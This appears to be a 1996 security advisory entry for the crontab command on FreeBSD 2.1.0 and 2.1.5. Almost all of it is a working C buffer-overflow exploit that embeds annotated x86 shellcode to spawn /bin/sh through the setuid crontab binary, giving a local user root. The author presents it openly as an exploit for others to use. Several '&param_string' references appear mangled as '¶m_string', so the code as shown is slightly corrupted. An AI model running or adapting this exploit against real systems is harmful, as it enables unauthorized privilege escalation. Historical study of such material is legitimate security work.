COMMAND

    crontab

SYSTEMS AFFECTED

    FreeBSD 2.1.0, 2.1.5

PROBLEM

/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/*                                 Hi !                                      */
/*      This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).     */
/*           If you have any problems with it, drop me a letter.             */
/*                              Have fun !                                   */
/*                                                                           */
/*                                                                           */
/*                         ----------------------                            */
/*             ---------------------------------------------                 */
/*  -----------------   Dedicated to my beautiful lady   ------------------  */
/*             ---------------------------------------------                 */
/*                         ----------------------                            */
/*                                                                           */
/*         Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su        */

#include <stdio.h>
main()
{
#define length 353
  int i,j;
  unsigned long start_addr;
  char *env[]={NULL};
  char param_string[length];
  char code_string[]=
                      {
                        "\xeb\x2a"                         /* jmp    cont               */

/* geteip: */           "\x5d"                             /* popl   %ebp               */
                        "\x55"                             /* pushl  %ebp               */
                        "\xfe\x4d\xe7"                     /* decb   0xffffffe7(%ebp)   */
                        "\xfe\x4d\xeb"                     /* decb   0xffffffeb(%ebp)   */
                        "\xfe\x4d\xec"                     /* decb   0xffffffec(%ebp)   */
                        "\xfe\x4d\xed"                     /* decb   0xffffffed(%ebp)   */
                        "\xff\x45\xef"                     /* incl   0xffffffef(%ebp)   */
                        "\xfe\x4d\xf4"                     /* decb   0xfffffff4(%ebp)   */
                        "\xc3"                             /* ret                       */

/* 0xffffffe0(%ebp): */ "/bin/sh"
/* 0xffffffe7(%ebp): */ "\x01"

/* execve:           */ "\x8d\x05\x3b\x01\x01\x01"         /* leal   0x3b,%eax          */
                        "\x9a\xff\xff\xff\xff\x07\x01"     /* lcall  0x7,0x0            */

/* cont:  */            "\xc7\xc4XXXX"                     /* movl   $0xXXXXXXXX,%esp   */
                        "\xe8\xcb\xff\xff\xff"             /* call   geteip             */
                        "\x81\xc5\xef\xff\xff\xff"         /* addl   $0xffffffef,%ebp   */
                        "\x55"                             /* pushl  %ebp               */
                        "\x55"                             /* pushl  %ebp               */
                        "\x81\xc5\xf1\xff\xff\xff"         /* addl   $0xfffffff1,%ebp   */
                        "\x55"                             /* pushl  %ebp               */
                        "\xe8\xd4\xff\xff\xff"             /* call   execve             */
                     };

  for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0';
  start_addr=0xefbfddf0;
  *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
  strncpy(¶m_string[200],code_string,strlen(code_string));
  *( (unsigned long*) ¶m_string[348])= start_addr;

  execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);

}
/* ---------------------------- CUT HERE ----------------------------------- */